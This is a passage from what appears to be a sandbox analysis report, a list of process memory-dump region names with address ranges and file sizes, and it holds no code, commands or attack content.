                                                • memory/3252-184-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-179-0x0000000006A70000-0x0000000006A71000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-186-0x00000000070C0000-0x00000000070C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-183-0x0000000007BA0000-0x0000000007BA1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-148-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-147-0x00000000051F0000-0x00000000051F1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3604-127-0x0000000000000000-mapping.dmp

                                                • memory/3664-262-0x0000000000400000-0x0000000000422000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/3664-263-0x000000000041C5F6-mapping.dmp

                                                • memory/3664-276-0x00000000055B0000-0x0000000005BB6000-memory.dmp

                                                  Filesize

                                                  6.0MB

                                                • memory/3848-121-0x0000000000000000-mapping.dmp

                                                • memory/3852-349-0x0000000000000000-mapping.dmp

                                                • memory/3852-369-0x0000000000000000-mapping.dmp

                                                • memory/3852-374-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/3884-381-0x0000000000000000-mapping.dmp

                                                • memory/3920-124-0x0000000000000000-mapping.dmp

                                                • memory/4156-198-0x0000000000000000-mapping.dmp

                                                • memory/4164-261-0x0000000000000000-mapping.dmp

                                                • memory/4172-358-0x0000000000000000-mapping.dmp

                                                • memory/4176-318-0x0000000000000000-mapping.dmp

                                                • memory/4180-359-0x0000000000000000-mapping.dmp

                                                • memory/4216-202-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4216-221-0x00000000064C0000-0x00000000064DD000-memory.dmp

                                                  Filesize

                                                  116KB

                                                • memory/4216-205-0x00000000053B0000-0x00000000053B1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4216-199-0x0000000000000000-mapping.dmp

                                                • memory/4220-357-0x0000000000000000-mapping.dmp

                                                • memory/4412-340-0x0000000000000000-mapping.dmp

                                                • memory/4456-259-0x0000000007520000-0x000000000754F000-memory.dmp

                                                  Filesize

                                                  188KB

                                                • memory/4456-210-0x0000000000000000-mapping.dmp

                                                • memory/4456-226-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4456-217-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4456-220-0x0000000005580000-0x0000000005581000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4488-213-0x0000000000000000-mapping.dmp

                                                • memory/4488-319-0x000000001C4B0000-0x000000001C4B2000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/4488-298-0x0000000000000000-mapping.dmp

                                                • memory/4532-304-0x0000000002362000-0x0000000002363000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4532-299-0x0000000000400000-0x0000000000467000-memory.dmp

                                                  Filesize

                                                  412KB

                                                • memory/4532-270-0x0000000000000000-mapping.dmp

                                                • memory/4532-306-0x0000000002363000-0x0000000002364000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4532-301-0x0000000002360000-0x0000000002361000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4532-296-0x0000000000470000-0x000000000051E000-memory.dmp

                                                  Filesize

                                                  696KB

                                                • memory/4532-308-0x0000000002364000-0x0000000002366000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/4536-331-0x0000000000000000-mapping.dmp

                                                • memory/4536-216-0x0000000000000000-mapping.dmp

                                                • memory/4564-219-0x0000000000000000-mapping.dmp

                                                • memory/4572-333-0x0000000000000000-mapping.dmp

                                                • memory/4584-339-0x0000000000000000-mapping.dmp

                                                • memory/4620-279-0x0000000000000000-mapping.dmp

                                                • memory/4632-223-0x0000000000400000-0x0000000000422000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/4632-224-0x000000000041C5CE-mapping.dmp

                                                • memory/4632-248-0x00000000051B0000-0x00000000057B6000-memory.dmp

                                                  Filesize

                                                  6.0MB

                                                • memory/4692-379-0x0000000000000000-mapping.dmp

                                                • memory/4744-320-0x0000000000000000-mapping.dmp

                                                • memory/4748-332-0x000000001CBB0000-0x000000001CBB2000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/4748-321-0x0000000000000000-mapping.dmp

                                                • memory/4756-251-0x000000001B550000-0x000000001B552000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/4756-234-0x0000000000000000-mapping.dmp

                                                • memory/4756-240-0x0000000000840000-0x0000000000841000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4768-281-0x0000000000000000-mapping.dmp

                                                • memory/4776-294-0x0000000000000000-mapping.dmp

                                                • memory/4804-238-0x0000000000000000-mapping.dmp

                                                • memory/4804-247-0x0000000000430000-0x0000000000431000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4804-274-0x000000001C210000-0x000000001C212000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/4804-256-0x000000001C620000-0x000000001C809000-memory.dmp

                                                  Filesize

                                                  1.9MB

                                                • memory/4812-246-0x0000000000B70000-0x0000000000B71000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4812-255-0x00000000053E0000-0x00000000053E1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/4812-257-0x00000000053B0000-0x00000000058AE000-memory.dmp

                                                  Filesize

                                                  5.0MB

                                                • memory/4812-239-0x0000000000000000-mapping.dmp

                                                • memory/4884-287-0x0000000000000000-mapping.dmp

                                                • memory/4920-254-0x0000000000000000-mapping.dmp

                                                • memory/4960-361-0x0000000000000000-mapping.dmp

                                                • memory/4984-290-0x0000000000000000-mapping.dmp

                                                • memory/4992-342-0x0000000000000000-mapping.dmp

                                                • memory/5000-348-0x0000000000000000-mapping.dmp

                                                • memory/5044-351-0x0000000000000000-mapping.dmp

                                                • memory/5056-258-0x0000000000000000-mapping.dmp

                                                • memory/5112-285-0x0000000000400000-0x000000000041B000-memory.dmp

                                                  Filesize

                                                  108KB

                                                • memory/5112-282-0x0000000000406200-mapping.dmp